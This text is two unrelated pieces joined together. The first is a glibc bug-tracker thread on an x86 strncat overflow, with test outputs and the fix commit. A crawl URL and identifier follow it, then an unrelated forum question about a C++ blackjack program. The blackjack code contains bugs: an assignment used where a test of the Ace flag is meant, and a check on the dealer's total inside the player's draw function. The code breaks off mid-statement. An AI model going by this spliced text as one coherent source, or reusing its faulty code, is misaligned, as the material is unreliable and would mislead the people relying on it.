alignas(64) char s[144]; with __attribute__ ((aligned (64))) char s[144]; (hopefully the replacement works as intended.) gcc test-strncat.c -std=c99 -o test-strncat gcc --version gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3 file test-strncat test-strncat: ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.31, BuildID[sha1]=0xb88137c1de1a1f534311ba81b1f403166b1091f1, not stripped ./test-strncat before: 01111111111111111111111111111111111111111111111111... after: 22222222222222222222222222222222201111111111111111... the string should end here ^ So works properly, no issues, right? Possible duplicate of BUG 17279 () $ file a.out a.out: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8730e4750909db3ae281264c026e8ceb6ec4a140, not stripped $ pacman -Q | grep glibc glibc 2.22-3 lib32-glibc 2.22-3.1 $ ./a.out before: 01111111111111111111111111111111111111111111111111... after: 22222222222222222222222222222222202222211111111111... the string should end here ^ This is on: Arch Linux 4.2.5-1-ARCH #1 SMP PREEMPT Tue Oct 27 08:13:28 CET 2015 x86_64 GNU/Linux Created attachment 8866 [details] Test strncat for all offsets (In reply to howey014 from comment #1) > I tried your code on ppc 32-bit, with glibc 2.20 as I didn't have 2.22 > available. (In reply to cvs268 from comment #2) > Tried the sample-code on ARM (Cortex A9) running Ubuntu 12.04. [skip] > So works properly, no issues, right? Thanks for testing it on different archs. Yes, this particular test is fine. I attached a fuller test which tries all offsets and all lengths upto 64 (you can change it to 128 if you want). It will either print "Ok" or details of the first found fail. Please try it on your platforms. (In reply to Xavier Roche from comment #3) > Possible duplicate of BUG 17279 > () Yes, seems to be the same. So, this bug is not merely theoretical but is triggered by real code. Is your code open source / publicly available? *** Bug 17279 has been marked as a duplicate of this bug. *** This is an automated email from the git hooks/post-receive script. It was generated because a ref change was pushed to the repository containing the project "GNU C Library master sources". The branch, master has been updated via 8dad72997af2be0dc72a4bc7dbe82d85c90334fc (commit) from d4d629e6187e33050902824a94498b6096eacac9 (commit) Those revisions listed above that are new to this repository have not appeared on any other notification email; so we list those revisions in full, below. - Log -----------------------------------------------------------------;h=8dad72997af2be0dc72a4bc7dbe82d85c90334fc commit 8dad72997af2be0dc72a4bc7dbe82d85c90334fc Author: Adhemerval Zanella <adhemerval.zanella@linaro.org> Date: Tue Jan 3 12:19:12 2017 -0200 Fix x86 strncat optimized implementation for large sizes Similar to BZ#19387, BZ#21014, and BZ#20971, both x86 sse2 strncat optimized assembly implementations do not handle the size overflow correctly. The x86_64 one is in fact an issue with strcpy-sse2-unaligned, but that is triggered also with strncat optimized implementation. This patch uses a similar strategy used on 3daef2c8ee4df2, where saturared math is used for overflow case. Checked on x86_64-linux-gnu and i686-linux-gnu. It fixes BZ #19390. [BZ #19390] * string/test-strncat.c (test_main): Add tests with SIZE_MAX as maximum string size. * sysdeps/i386/i686/multiarch/strcat-sse2.S (STRCAT): Avoid overflow in pointer addition. * sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S (STRCPY): Likewise. ----------------------------------------------------------------------- Summary of changes: ChangeLog | 10 ++++++++++ string/test-strncat.c | 15 +++++++++++++++ sysdeps/i386/i686/multiarch/strcat-sse2.S | 2 ++ sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S | 2 ++ 4 files changed, 29 insertions(+), 0 deletions(-) Fixed by 8dad72997af2be.
https://sourceware.org/bugzilla/show_bug.cgi?id=19390
CC-MAIN-2017-51
refinedweb
977
69.28
9694/download-specified-location-through-selenium-chrome-driver I was automatically downloading links using selenium with chromed river and python. How can I select the download directory through the python program so that it does not get downloaded in the default Downloads directory? Create a profile for chrome and define the download location for the tests. Below is an example: from selenium import webdriver options = webdriver.ChromeOptions() options.add_argument("download.default_directory=C:/Downloads") driver = webdriver.Chrome(chrome_options=options) Hey @Shan, I'm not too confident about doing it that way. There is no use case for this scenario. From what I know, to change the default download location, you need to update the profile default settings by setting preferences. We use ChromeOptions in Chrome to update the preferences, in Firefox we use FirefoxProfile and for doing it in IE, we use DesiredCapabilities. The challenge however is, we cannot update the preferences during execution because it requires a restart of ChromeDriver instance. And if we restart ChromeDriver, our session will get terminated. Hence this is a no-show. However, an alternative could be that, you set the download-to-path in the code itself. But i mist warn you, it will be extremely challenging to write the logic for the download path to change for every download. But its worth giving a short. Hey Uday, you can write following lines ...READ MORE You can set the default download location ...READ MORE I found that my MIME file type .. with tag. #this code will ...READ MORE You should try to directly log in ...READ MORE OR
https://www.edureka.co/community/9694/download-specified-location-through-selenium-chrome-driver?show=9702
CC-MAIN-2019-35
refinedweb
264
59.7
This page it intended to show the PCA9532 - what it can do, how it works, how to interface it, and how an API can be built for it. The PCA9532 is an I2C IO expander. it has 16 open drain output pins that are designed to drive LEDs. Each pin can sink 25mA, and can be set to ON, OFF, or blink at one of two programmable rates. The rates are global and have fully programmable period and duty cycle. The achieveable period ranges from 0.6Hz to 152Hz, with duty cycle from 0 to 100% in 256 steps. The PCA9532 device is well documented on the the NXP website that gives links to where to buy it, data sheets as so on As ever the first thing to do is to establish some kind of communication with the PCA9532. A brief look through the datasheet, suggests that the easiest thing to do is : I will do this using the I2C library. The datasheet for this part defines the default address to be 0xC0, and as all the three user defined address bits (A2-0, pins 1-3 on the chip) are all set to zero, this is the final address for this experiment. #include "mbed.h" I2C i2c (p28,p27); int main() { char i2c_data[2]; while (1) { // clear LS0 to turn LED0-3 off i2c_data[0] = 0x06; // LS0 register i2c_data[1] = 0x00; // all off i2c.write(0xC0,i2c_data,2); wait (0.2); // Set LS0 to 0x55 to turn LED0-3 off i2c_data[0] = 0x06; // LS0 register i2c_data[1] = 0x55; // all on i2c.write(0xC0,i2c_data,2); wait (0.2); } } Great! First time around, I got exactly what I was hoping for. The four pins LED0-3 all toggle on and off happily. Now we're communicating with the PCA9532, we'll look at the registers, addressing, bus transactions, and how to build and API for this. As with many I2C slaves, the address is expressed as an 8 bit byte. The top 4 bits are fixed to a a specific value for the part, the next three bits are controlled by user pins on the physical device (A2-0), this means 8 unique addresses can be set - upto 8 of these on a single I2C bus, and finally the bottom bit is the Read/Write bit. This bottom bit is overwritten as needed in the lmbed library call for read and write. So the top nibble of the address is 0xC, with the bottom nibble being made from the three bit user address and the read/write bit, which is actually a "dont care". The functionality of the PCA9532 is controlled by reading and writing the 10 registers of the PCA9532. The registers are pretty stright forward in what they do, and are listed below : We're already seen that writing to the PCA9532 registers behaves as we'd expect, but reading is slightly different. The PCA9532 uses a control byte, which is essentially just the address. A write is therefore just the control byte followed by the data. A read is slightly different than intially expected. To read from a register, first its address must written to the control byte with an I2C write. The read operation following the write to the control byte returns the address of the register. Write : Read : The intention is to build up a C++ class for the PCA9532 so that it can be specifed by pin connection and address, and then controlled in terms of the LED behaviour Since all of the functionality is controlled through register access, the first step is to build simple methods that give a logical abstraction to the registers, which leads to the following API definition: class PCA9532 { public: PCA9532(PinName sda, PinName scl, int addr); protected: void _write(int reg, int data); int _read(int reg); int _addr; I2C _i2c; }; The read and write functions are fairly straight forward to define using the bus diagrams above. void PCA9532::_write(int reg, int data) { char args[2]; args[0] = reg; args[1] = data; _i2c.write(_addr, args,2); } int PCA9532::_read(int reg) { char args[2]; args[0] = reg; _i2c.write(_addr, args, 1); _i2c.read(_addr, args, 1); return(args[0]); } Now that we have these in place, all our actual behaviour is a matter of setting registers accordingly. All of our behaviour can be split into configuring the PWM channels (period, duty cycle) and selecting one of the four modes for each LED (Off,On,Pwm0, Pwm1). The ways to expose this that seems to make sense is to manipulate one LED, or all at once, e.g. Adding in the need to configure PWM channels, the rest of the API looks like this : int SetLed (int led, int mode); int SetMode (int mask, int mode); int Duty (int channel, float duty); int Period (int channel, float period); The code to do this has been implemented in the following library: A hello world program for this library: This hello world example has a Cheat Sheet for the Embedded Artsist Baseboard Please log in to post a comment.
http://mbed.org/users/chris/notebook/pca9532---i2c-led-dimmer/
crawl-003
refinedweb
852
65.86
Created on 2005-01-31 00:58 by irmen, last changed 2008-06-02 03:15 by hdiogenes.. Logged In: YES user_id=469548 Here's a patch. We're interested in two things in the patched loop: * the rest of the multipart/form-data, including the headers for the current part, for consumption by HeaderParser (this is the tail variable) * the rest of the multipart/form-data without the headers for the current part, for consumption by FieldStorage (this is the message.get_payload() call) Josh, Irmen, do you see any problems with this patch? (BTW, this fix should be ported to the parse_multipart function as well, when I check it in (and I should make cgibug.py into a test)) Logged In: YES user_id=693077 Johannes, your patch looks fine to me. It would be nice if we didn't have to keep reading back each part from the parsed message, though. I had an idea for another approach. Use email to parse the MIME message fully, then convert it to FieldStorage fields. Parsing could go something like: == CODE == from email.FeedParser import FeedParser parser = FeedParser() # Create bogus content-type header... parser.feed('Content-type: %s ; boundary=%s \r\n\r\n' % (self.type, self.innerboundary)) parser.feed(self.fp.read()) message = parser.close() # Then take parsed message and convert to FieldStorage fields == END CODE == This lets the email parser handle all of the complexities of MIME, but it does mean that we have to accurately re-create all of the necessary headers. I can cook up a full patch if anyone thinks this would fly. Logged In: YES user_id=129426 Johannes: while your patch makes my cgibug.py test case run fine, it has 2 problems: 1- it runs much slower than the python2.4 code (probably because of the reading back thing Josh is talking about); 2- it still doesn't fix the second problem that I observed: cgi.FieldStorage never completes when fp is a socket. I don't have a separate test case for this yet, sorry. So Josh: perhaps your idea doesn't have these 2 problems? Logged In: YES user_id=693077 Irmen, can you try to create a test case where the cgi.FieldStorage never completes, so I can make sure that any fix I come up with resolves it? I will try to put together an implementation where the email parser parses the whole multipart message. Logged In: YES user_id=129426 Yes, I'll try to make a test case for that within the next few days. Logged In: YES user_id=129426 I've added a test that shows the 'freezing' problem I talked about. Start the server.py, it will listen on port 9000. Open the post.html in your web browser, enter some form data, and submit the form. It will POST to the server.py and if you started that one with cvs-python (2.5a0) it will freeze on the marked line. If you start server.py with Python 2.4, it will work fine. Logged In: YES user_id=693077 I've been playing with using the email parser to do the whole job of parsing the data, and I think it's too big of a change. It'd be very hard to ensure API compatibility and the same behaviour. I think that in the long run, it's the right thing to do, but I think that the API should change when that change is made. My recommendation for the time being is to revert the original patch that I made. Logged In: YES user_id=4771 The problem is still there now (5 months later), so should I go ahead and revert the cgi.py changes of r1.83? I does break user code out there. Logged In: YES user_id=129426 I vote for revert, so that my code may run again on Python 2.5. Also see Josh's comment , with which I agree. Logged In: YES user_id=693077 Yes, please revert the patch. Logged In: YES user_id=4771 Reverted (Lib/cgi.py r1.85). Logged In: YES user_id=29957 Er - while reverting it makes the code work again, I'm _really_ unhappy with this as a long-term solution. We really need to be getting rid of the old, unmaintained, and generally awful code of things like mimetools. > Er - while reverting it makes the code work again, I'm > _really_ unhappy with this as a long-term solution. I've addressed almost everything that's discussed here in issue 2849, implementing Josh's suggestion of using FeedParser. It removes rfc822 (but not mimetools [yet]) dependency from the cgi module, without the parsing problem pointed by cgibug.py and without hanging, as shown in server.py + post.html. Also, preliminary tests revealed that the new FieldStorage.read_multi is about 10 times faster than the old one.
http://bugs.python.org/issue1112856
crawl-002
refinedweb
810
75
05 September 2011 17:27 [Source: ICIS news] LONDON (ICIS)--?xml:namespace> Technical gas would be sent through the pipeline from Putin signalled the start of Nord Stream operations at a meeting of his governing United Russia party. The new €7.4bn ($10.4bn) infrastructure, which takes a route across the Baltic Sea, will help Russia deliver gas to Europe without it having to overcome obstacles caused by the policies of gas transit states through which its old pipelines run, such as the Druzhba, Putin said. On 25 August, the Switzerland-headquartered Nord Stream joint venture announced that the 1,220-kilometre Nord Stream had been connected to the newly built €1bn, 470-kilometre OPAL pipeline, the largest natural gas pipeline in The OPAL runs from Lubmin, via Mecklenburg-Western Pomerania, Brandenburg and Saxony to the Germany-Czech Republic border, where it is to be connected to the the €400m Gazela Pipeline which will deliver Nord Stream gas across central Europe. Nord Stream has a capacity of 55bn cubic metres (cbm) of gas per year, while the capacity of the OPAL is 36bn cbm
http://www.icis.com/Articles/2011/09/05/9490216/russia-to-start-pumping-nord-stream-gas-on-tuesday-putin.html
CC-MAIN-2015-22
refinedweb
184
50.7
maintaining a contrast with the foreground color that is high enough (using either white or black) to pass WCAG AA accessibility standards. It’s astonishingly efficient to do this in JavaScript with a few lines of code: var rgb = [255, 0, 0]; function setForegroundColor() { var sum = Math.round(((parseInt(rgb[0]) * 299) + (parseInt(rgb[1]) * 587) + (parseInt(rgb[2]) * 114)) / 1000); return (sum > 128) ? 'black' : 'white'; } This takes the red, green and blue (RGB) values of an element’s background color, multiplies them by some special numbers (299, 587, and 144, respectively), adds them together, then divides the total by 1,000. When that sum is greater than 128, it will return black; otherwise, we’ll get white. Not too bad. The only problem is, when it comes to recreating this in CSS, we don’t have access to a native if statement to evaluate the sum. So,how can we replicate this in CSS without one? Luckily, like HTML, CSS can be very forgiving. If we pass a value greater than 255 into the RGB function, it will get capped at 255. Same goes for numbers lower than 0. Even negative integers will get capped at 0. So, instead of testing whether our sum is greater or less than 128, we subtract 128 from our sum, giving us either a positive or negative integer. Then, if we multiply it by a large negative value (e.g. -1,000), we end up with either very large positive or negative values that we can then pass into the RGB function. Like I said earlier, this will get capped to the browser’s desired values. Here is an example using CSS variables: :root { --red: 28; --green: 150; --blue: 130; --accessible-color: calc( ( ( ( (var(--red) * 299) + (var(--green) * 587) + (var(--blue) * 114) ) / 1000 ) - 128 ) * -1000 ); } .button { color: rgb( var(--accessible-color), var(--accessible-color), var(--accessible-color) ); background-color: rgb( var(--red), var(--green), var(--blue) ); } If my math is correct (and it’s very possible that it’s not) we get a total of 16,758, which is much greater than 255. Pass this total into the rgb() function for all three values, and the browser will set the text color to white. Throw in a few range sliders to adjust the color values, and there you have it: a dynamic UI element that can swap text color based on its background-color while maintaining a passing grade with WCAG AA. See the Pen CSS Only Accessible Button by Josh Bader (@joshbader) on CodePen. Putting this concept to practical usePutting this concept to practical use Below is a Pen showing how this technique can be used to theme a user interface. I have duplicated and moved the --accessible-color variable into the specific CSS rules that require it, and to help ensure backgrounds remain accessible based on their foregrounds, I have multiplied the --accessible-color variable by -1 in several places. The colors can be changed by using the controls located at the bottom-right. Click the cog/gear icon to access them. See the Pen CSS Variable Accessible UI by Josh Bader (@joshbader) on CodePen. There are other ways to do thisThere are other ways to do this A little while back, Facundo Corradini explained how to do something very similar in this post. He uses a slightly different calculation in combination with the hsl function. He also goes into detail about some of the issues he was having while coming up with the concept:? He goes on to mention that Edge wasn’t capping his large numbers, and during my testing, I noticed that sometimes it was working and other times it was not. If anyone can pinpoint why this might be, feel free to share in the comments. Further, Ana Tudor explains how using filter + mix-blend-mode can help contrast text against more complex backgrounds. And, when I say complex, I mean complex. She even goes so far as to demonstrate how text color can change as pieces of the background color change — pretty awesome! Also, Robin Rendle explains how to use mix-blend-mode along with pseudo elements to automatically reverse text colors based on their background-color. So, count this as yet another approach to throw into the mix. It’s incredibly awesome that Custom Properties open up these sorts of possibilities for us while allowing us to solve the same problem in a variety of ways. Pretty clever This is awesome! I love the pen you made about “Putting this concept to practical use”. Thanks for the article! Where did you get the “special numbers” from? The W3C has them listed here… I have no idea why but it doesn’t work on Gecko 56 The problems with capping numbers may be related to the OS and hardware setup. The way color functions are implemented can easily be dependent on whether the browser has access to hardware accelleration or not. In the past, I have observed similar errors for the “gooey effect” (in this case, the alpha value), although this seems to be resolved by now. Josh, this is a cool idea but I’m afraid your math is not accurate—neither in the JavaScript nor the CSS. The “special numbers” you refer to are poorly explained on that w3c page. In fact, the red, blue and green need to be first normalized (set in a range from 0 to 1) and then linearized (converted from sRGB to linearRGB) before you pass them in to that formula. The latter step is missed in many implementations, including for example Bootstrap’s yiq()Sass function, but it is absolutely the only correct calculation and there are w3c and WCAG documents that do correctly reference it. Unfortunately it requires a pow()function, which JavaScript has but CSS does not, so an accurate emulation of this using calc()won’t work. This w3c document correctly shows that the RGB values must be linearized. The previous document you linked mentions “This algorithm is taken from a formula for converting RGB values to YIQ values” without explaining that YIQ color assumes the gamma is already linear. And according to caniuse.com, –var() still not an option for IE11, which I’m discovering by angry backlash from various clients, still in use… Great idea! How could we translate this to SCSS? This would get around the IE11 compatibility issue. I actually later found Bootstrap’s YIQ function at. I guess it’s the same sort of thing? It’s the same idea, but unfortunately mathematically incorrect ♂️ Lu that was my concern. Would be great if we could override the function to make it work properly. @Glenn This pen contains the correct math, also a copy of Bootstrap’s yiq() for comparison. Watch out though, this code depends on a Sass pow()function. I’m using mathsass to provide one, via a Pen dependency (see the settings). This library is good but runs in SassScript so it’s slow. Ideal would be to plug in some JavaScript math functions using Sass’ functionsNode API. I have a simple set of these that I could put in a Gist if you’re interested. Wow thanks for that Lu. I’m definitely interested. I think whatever the solution is it’ll need to be easy to plug in to a new project otherwise my colleagues won’t use it – they’re not as interested in this stuff as I am. Really great job! Unfortunately, MS Edge don’t like calc() with css variables for now :/ Have to wait to use it in production. Great job, except for one thing: your color picker sliders don’t have accessible colored text to indicate the slider’s value! So if you make the quaternary color (which is used for the background of the color picker) very light, you won’t be able to see the actual numeric values of the sliders. I’m trying this in Chrome, so it’s possible other browsers do things differently; but you might want to consider putting a dark backdrop behind the sliders if you can’t control the color of their indicator text.
https://css-tricks.com/css-variables-calc-rgb-enforcing-high-contrast-colors/
CC-MAIN-2021-43
refinedweb
1,361
62.07
React Hooks Basics — Building a React Native App with React Hooks Aman Mittal— March 19, 2019 React 16.8 welcomed the dawn of Hooks. This new addition is both a new concept and pragmatic approach that helps you use state and lifecycle methods behavior in functional React components, that is, without writing a class. The intention to implement this new feature in React ecosystem is to benefit all the community. Whether you are a developer with a front-end role or write mobile apps using React Native, chances are that you are going to come across Hooks often enough in your working environment. Of course, you do not have to use them. You can still write class components, they are not going anywhere yet. However, I personally like to think it is an important part of being a developer and using something like React in our work/day-job/side-hustle projects by keeping up to date with these new features. Following the footsteps of ReactJS, React Native community recently announced that they will be adding support for hooks shortly in the upcoming version 0.59. I have been waiting for them to officially make this announcement before I publish this tutorial, only to spike up your interest in Hooks. In this tutorial, I will walk you through the steps on using Hooks in a React Native application by building a small demo app and understand the most common Hooks in detail before that. Moreover, I am going to briefly introduce you to the concept of flexbox and how is it significantly different in React Native than the web. Tldr; - Requirements - Setting up Crowdbotics Project - Setup a React Native app - What are Hooks? - Implementing Hooks in react native - Building a Todo List App - What is flexbox? - Adding Hooks to the Todo List App - Rendering the list - Completing and Deleting an Item - Conclusion Requirements In order to follow this tutorial, you are required to have the following installed on your dev machine: - NodeJS above 8.x.xinstalled on your local machine - Know, how to run simple npm commands - JavaScript/ES6 basics watchmanthe file watcher installed react-native-cliinstalled through npm For a complete walkthrough on how you can set up a development environment for React Native, you can go through official documentation here. Setting up a Crowdbotics Project In this section, you will be setting up a Crowdbotics project that has React Native pre-defined template with stable and latest dependencies for you to leverage. However, at the time of writing this tutorial, the template does not use React Native version 0.59. So instead of going into too much hassle about upgrading this React Native app, I will be walking you through creating a new React Native project in the next section. To follow along, setting up a new project using Crowdbotics app builder service is easy. Visit app.crowdbotics.com dashboard. Once you are logged in, choose Create a new application. On Create an Application page, choose React Native template under Mobile App.. Setup a React Native App Once you installed `react-native-cli` you can begin by generating a React Native project. Run the below command to initialize a new React Native project. Also, note that you can name your React Native app anything. react-native init RNHooksTODOAPP Using this command, a new project folder will be generated, traverse inside it and you will be welcome by a slightly different file system (a new file that you might not have seen before is metro.config.js, which you can ignore it for now). Also, note that RNHooksTODOAPP is the project and directory name, so in its place, you can enter anything. For more information on the current release candidate of React Native, you can visit their Github project. facebook/react-native _A framework for building native apps with React. Contribute to facebook/react-native development by creating an account…_github.com To run the mobile application in an iOS/Android simulator you can run the same old CLI commands like react-native run-ios or run-android. What are Hooks? Hooks in React have been available since the version 16.7.0-alpha. They are functions that allow you to use React state and a component's lifecycle methods in a functional component. Hooks do not work with classes. If you are familiar with React, you know that the functional component has been called as a functional stateless component. Not any more. Since previously, only a class component allowed you to have a local state. Using Hooks, you do not have to refactor a class component when using React or React Native into a functional component only because you want to introduce local state or lifecycle methods in that component. In other words, Hooks allow us to write apps in React with function components. React provides a few built-in Hooks like useState and useEffect. You can also create your own Hooks to re-use the stateful behavior between different components. Implementing Hooks in React Native In the example below, let us take a look at how you will manage the local state of a component by using Hooks. Open up App.js file and paste this code. import React, { useState } from 'react';import { StyleSheet, Text, View, Button } from 'react-native';export default function App() {const [count, setCount] = useState(0);return (<View style={styles.container}><Text>You clicked {count} times.</Text><ButtononPress={() => setCount(count + 1)}</View>);}const styles = StyleSheet.create({container: {flex: 1,justifyContent: 'center',alignItems: 'center',backgroundColor: '#F5FCFF'},welcome: {fontSize: 20,textAlign: 'center',margin: 10},instructions: {textAlign: 'center',color: '#333333',marginBottom: 5}}); We will start by writing a basic old-fashioned counter example to understand the concept of using Hooks. In the above code snippet, you are starting by importing the usual along with useState from react library. This built-in hook allows you to add a local state to functional components. Notice that we are writing a functional component: export default function App(), instead of traditionally writing a class component we are defining a normal function. This App function has state in the form of const [count, setCount] = useState(0). React preserves this state between all the re-rendering happening. useState here returns a pair of values. The first one being the count which is the current value and the second one is a function that lets you update the current value. You can call setCount function from an event handler or from somewhere else. It is similar to this.setState in a class component. In above, we are using the function inside the button component: setCount(count + 1) useState(0) hook also takes a single argument that represents the initial state. We are defining the initial state as 0. This is the value from which our counter will start. To see this in action, open two terminal windows after traversing inside the project directory. # first terminal window, runnpm start# second window, runreact-native run-ios Once the build files are created, the simulator will show you a similar result like below. If you play around a bit and hit the button Click me, you will see the counter's value is increased. As you know by now, that the App component is nothing but a function that has state. You can even refactor it like below by introducing another function to handle Button click event and it will still work. export default function App() {const [count, setCount] = useState(0);function buttonClickHandler() {setCount(count + 1);}return (<View style={styles.container}><Text>You clicked {count} times.</Text><ButtononPress={buttonClickHandler}</View>);} Building a Todo List app with Hooks In this section, you are going to build a Todo List application using React Native framework and Hooks. I personally love building Todo list applications when getting hands-on experience over a new programming concept or approach. We have already created a new project in the last section when we learned about Hooks. Let us continue from there. Open up App.js and modify it with the following code. import React from 'react';import {StyleSheet,Text,View,TouchableOpacity,TextInput} from 'react-native';export default function App() {return (<View style={styles.container}><Text style={styles.header}>Todo List</Text><View style={styles.textInputContainer}><TextInputstyle={styles.textInput}multiline={true}<%'}}); We need a text input field to add items to our list. For that, TextInput is imported from react-native. For demonstration purposes, I am keeping styles simple, especially the background color. If you want to make the UI look good, go ahead. In the above code, there is a header called Todo List which has corresponding header styles defined using StyleSheet.create object. Also, take notice of the View which uses justifyContent with a value of flex-start. What is flexbox? Creating a UI in a React Native app heavily depends on styling with flexbox. Even if you decide to use a third party library kit such as nativebase or react-native-elements, their styling is based on flexbox too. The flexbox layout starts by creating a flex container with an element of display:flex. If you are using flexbox for the web you will have to define this display property. In react native, it is automatically defined for you. The flex container can have its own children across two axes. The main axis and cross axis. They both are perpendicular to each other. These axes can be changed as a result of property flexDirection. In the web, by default, it is a row. In React Native, by default, it is a column. To align an element along the horizontal axis or the cross axis in React Native you have to specify in the StyleSheet object with the property of flexDirection: 'row'. We have done the same in the above code for the View that contains TextInput field. Flexbox is an algorithm that is designed to provide a consistent layout on different screen sizes. You will normally use a combination of flexDirection, alignItems, and justifyContent to achieve the right layout. Adding justifyContent to a component's style determines the distribution of children elements along the main axis. alignItems determine the distribution of children elements along the cross axis. Back to our app. Right now, if you run it in a simulator, it will look like below. Let us add an icon to represent a button to add items to the todo list. Go to the terminal window right now and install react-native-vector-icons. npm install -S react-native-vector-icons# Also link itreact-native link react-native-vector-icons Now go back to App.js file. We have already imported TouchableOpacity from react-native core. Now let us import Icon from react-native-vector-icons. import {StyleSheet,Text,View,TouchableOpacity,TextInput} from 'react-native';import Icon from 'react-native-vector-icons/Feather'; Next step is to add the Icon element inside TouchableOpacity next to the TextInput. This means the plus to add an item to the list must be on the same line or axis as the text input field. TouchableOpacity makes the icon clickable and can have an event listener function (which we will add later) to run the business logic for adding an item to the list. <View style={styles.textInputContainer}><TextInputstyle={styles.textInput}multiline={true}<TouchableOpacity><Icon name="plus" size={30} color="blue" style={{ marginLeft: 15 }} /></TouchableOpacity></View> Now if you go back to the simulator you will have the following screen. Adding Hooks to the App In this section, you are going to add a local state to the component using Hooks. We will start by initializing the local state for the App component with the new hooks syntax. For that, you have to require useState from react core. Also, note that the initial state passed below is passed as an argument to the useState() function. import React, { useState } from 'react';// ...export default function App() {const [value, setValue] = useState('');const [todos, setTodos] = useState([]);addTodo = () => {if (value.length > 0) {setTodos([...todos, { text: value, key: Date.now(), checked: false }]);setValue('');}};// ...} The first value is the value of TextInput and it is initially passed as an empty string. In the next line, todos are declared as an empty array that will later contain multiple values. The setValue is responsible for changing the value of value on TextInput and then initializing the empty value when the value from the state is assigned as an item to todos array. setTodos is responsible for updating the state. The addTodo function we define is a handler function that will check if the TextInput field is not empty and the user clicks the plus icon, it will add the value from state to the todos and generate a unique key at the same time to retrieve each todo item record from todos array to display as a list. The initial value for checked is false since no todo item can be marked as completed by default, that is when adding it to the list. Here is the complete code for App.js after adding state through Hooks. import React, { useState } from 'react';import {StyleSheet,Text,View,TouchableOpacity,TextInput} from 'react-native';import Icon from 'react-native-vector-icons/Feather';export default function App() {const [value, setValue] = useState('');const [todos, setTodos] = useState([]);addTodo = () => {if (value.length > 0) {setTodos([...todos, { text: value, key: Date.now(), checked: false }]);setValue('');}};return (<View style={styles.container}><Text style={styles.header}>Todo List</Text><View style={styles.textInputContainer}><TextInputstyle={styles.textInput}multiline={true}placeholder="What do you want to do today?"placeholderTextColor="#abbabb"value={value}onChangeText={value => setValue(value)}/><TouchableOpacity onPress={() => handleAddTodo()}>><Icon name="plus" size={30} color="blue" style={{ marginLeft: 15 }} /></TouchableOpacity><%'}}); Rendering the List You are going to create a new component that will be responsible for displaying each task that a user adds. Create a new file called TodoList.js and add the following code to the file. import React from 'react';import { StyleSheet, TouchableOpacity, View, Text } from 'react-native';import Icon from 'react-native-vector-icons/Feather';export default function TodoList(props) {return (<View style={styles.listContainer}><Icon name="square" size={30} color="black" style={{ marginLeft: 15 }} /><Text style={styles.listItem}>{props.text}</Text>: 'white'}}); Now let us import this component in App.js to render todo items when we add them by clicking the plus sign button. Also, you are now required to import ScrollView in App component from react native core. import {StyleSheet,Text,View,TouchableOpacity,TextInput,ScrollView} from 'react-native';// ...import TodoList from './TodoList';// ...return (<View style={styles.container}>{/* ... */}<ScrollView style={{ width: '100%' }}>{todos.map(item => (<TodoList text={item.text} key={item.key} />))}</ScrollView></View>); The ScrollView is a component that renders all its child at once. A good case to use when you are not rendering a large amount of data or data coming from a third party API. Now, enter a new task (like below) and try adding it to the todo list. Completing and Deleting an Item This is the last section to complete our application. We need two handler functions to implement functionalities of checking a todo list item mark and deleting a todo list item. Define two functions like below after addTodo. checkTodo = id => {setTodos(todos.map(todo => {if (todo.key === id) todo.checked = !todo.checked;return todo;}));};deleteTodo = id => {setTodos(todos.filter(todo => {if (todo.key !== id) return true;}));}; The first function checkTodo uses map function to traverse the complete todos array, and then check only that item that has been toggled by the user using its icon on the mobile app by matching its key (look at the addTodo function, we defined a key when adding an item to the todo list). The deleteTodo function uses filter to remove an item from the list. To make it work, we need to pass both of these functions to TodoList component. // App.js<ScrollView style={{ width: '100%' }}>{todos.map(item => (<TodoListtext={item.text}key={item.key}checked={item.checked}setChecked={() => checkTodo(item.key)}deleteTodo={() => deleteTodo(item.key)}/>))}</ScrollView> Now open, TodoList.js and these new props. import React from 'react';import { StyleSheet, View, Text } from 'react-native';import Icon from 'react-native-vector-icons/Feather';export default function TodoList(props) {return (<View style={styles.listContainer}><Iconname={props.checked ? 'check' : 'square'}size={30}color="black"style={{ marginLeft: 15 }}onPress={props.setChecked}/><View>{props.checked && <View style={styles.verticalLine} />}<Text style={styles.listItem}>{props.text}</Text></View>: 'black'},verticalLine: {borderBottomColor: 'green',borderBottomWidth: 4,marginLeft: 10,width: '100%',position: 'absolute',marginTop: 15,fontWeight: 'bold'}}); Now run the app and see it in action. Conclusion This completes our tutorial. I hope this tutorial helps you understand the basics of React Hooks and then implement them with your favorite mobile app development framework, React Native. You can extend this demo application by adding AsyncStorage or a cloud database provider and making this application real time. Also, do not forget to enhance the UI to your liking. To read more about React Hooks check out the official Overview page here. The complete code for this tutorial is available in the Github repository below. amandeepmittal/RNHooksTODOAPP Originally published at Crowdbotics
https://amanhimself.dev/build-a-react-native-app-with-react-hooks/
CC-MAIN-2020-10
refinedweb
2,845
57.06
0 I dont know why, but this program I wrote is having a problem. it has a problem converting an Ace from 11 to 1 when the players have more than 21. if you could look over this, I would appreciate it. #include <iostream> #include <ctime> using namespace std; double Card = 0; char cardA; int YN = 1; bool Ace = false; int Play = 1; double pHand = 0; double dHand = 0; double Chips = 1000; double bet = 0; int Win = 0; void cardT() { int KQJ = 0; if (Card == 11) { cout << "Dealer draws a Jack\n"; Card = 10; KQJ = 1; } if (Card==12) { cout << "Dealer draws a Queen\n"; Card = 10; KQJ = 1; } if (Card==13) { cout << "Dealer draws a King\n"; Card = 10; KQJ = 1; } if (Card == 1) { cout << "Dealer draws an Ace\n"; Card = 11; Ace = true; KQJ = 1; } if (KQJ != 1) { cout << "Dealer draws a "<< Card << endl; } } void dDraw() { Card = ( rand() %13) + 1; //Dealer Draws cardT(); dHand = dHand+Card; if ((dHand > 21) && (Ace = true)) { dHand = dHand - 10; Ace= false; } cout << "dealer has " << dHand<< endl << endl; } void pDraw() { Card = ( rand() %13) + 1; //Player Draws cardT(); pHand = pHand+Card; if ((dHand >21) && (Ace = true)) { pHand = pHand - 10; Ace=false; } cout << "player has " << pHand<< endl << endl; } int main() { cout << "Welcome to Blackjack. Would you like to play?\n"; cout << " 1.Yes\n 2.No\n"; cin >> Play; while (Play != 2) { cout << "You have $" << Chips << " in chips.\n"; cout << "Place your bet\n"; cin >> bet; while (Chips < 